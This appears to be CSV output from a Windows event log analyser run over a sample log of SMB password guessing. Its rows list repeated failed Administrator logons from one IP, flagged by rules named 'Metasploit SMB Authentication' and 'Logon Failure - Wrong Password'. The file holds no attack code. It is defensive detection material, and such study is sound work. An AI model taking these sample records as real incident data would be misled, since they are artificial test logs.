NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALJxKGwyZz7JDpRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8tioTO3TEIzdzY0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5dIKTgQkvPKzKJoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ta0IMrlArbgONhDG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MKNUu4624Rvr87kK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7jIL2FkXzWqvWTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: oJMVh1zdQt7EikVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OqvximSAPlXZ3An : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tr2GQ1F3jccpWrsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCmbvQXXXzhHOdMG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qTp1BwPv8XiK2mrG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rnb19AXxM5ArcLxX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUS5CKq2W1rkq46d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FzKSUVdsC5eENWDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QFL07Mhy4iw5psBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMpitnzLXDLSXL73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RSfaPdcsiRQoGYYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJRP4bS9Qgg06Z5P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3Z4veMNKngHUDoRf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmF0YFgAMSRotb1y : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DmrbO3dZw46DgmZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qg4CMwLpfzLrvDPj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKDKUXNNhuSqRiTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cBocrjNXjmuPCKRJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: loCrAXibgVxcOtCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZ7pHOJeOExrON2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MeucKpaodpmdsqhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LRlmBeBlV6n4MQyo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8FYOF6HxJHqm7GW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9tBtz1GYn5J8sbFH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qn8PlxEzIu9AKUgt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdjqlNDU3U150UAw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esaTfuwuiFAkIVs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y4LbVQ5ytgVCqFmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rWoX76sgYTVwxkD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQFJRRYn6sjYK5cD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: wyVuBGEFGJqImQ7W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pRvnyVGxG8i0e3PQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X6Hv2fj43a8j1O2P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: myP4zVFyw2qE1SV7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lpmBcVilH72dYF7E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jd9hKGDxLcnZphlL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OmXgOD9kaGJ4PIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BpQtWW0fAEzNH28B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EgNkY8LKSWcnLM00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8S1dUwb3HjOnEs9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
